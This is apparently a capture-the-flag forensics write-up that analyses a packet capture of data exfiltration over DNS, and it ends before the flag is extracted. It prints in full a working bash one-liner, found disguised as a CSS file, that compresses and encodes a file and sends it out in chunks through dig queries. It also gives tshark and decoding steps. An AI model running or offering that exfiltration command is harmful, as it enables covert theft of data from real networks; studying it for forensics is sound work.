we have network traffic capture
from description and type of file we know it data exfiltration
Data Exfiltration is the theft or unauthorized transfer of data from a device or network and send it to server for attacker, to more information

after analysis the file i found dns requests and http traffic

lets check dns requests

i see requests from ip :
Victime ip :
Malicious dns server ip :
but the data not base encode or hex we need to more analysis :)
Now i will try to analysis the http requests
after i saved http data i see something weird

f=file.txt; s=2;b=5;c=0; for r in $(for i in $(gzip -c $f| xxd -p | base32 -w0 | base64 -w0 |sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @ `echo -ne $r|tr "+" "*"|tr "Q" "$"` +short; sleep 1s; done
that is weird its must css file not bash script
that mean the attacker used this script to exfiltration data

user-agent : Wget
that mean the attacker download the script in server using wget
now time to understand code

in first i tested file in my network to show the traffic
now we need to get dns requests
tshark -r ctf.pcap.pcapng -e “dns.qry.name” -Tfields -Y “ip.dst==”
i used tsark
to get it
-r set the filename to read from
-e to select to filter data we need get
-Y filter, i use it to select only ip address
now after save data we need reverse the code to get the flag
from end to up
to beQ
and decode it as base64
and decode it as base32
and decode it as hex

now i will extract it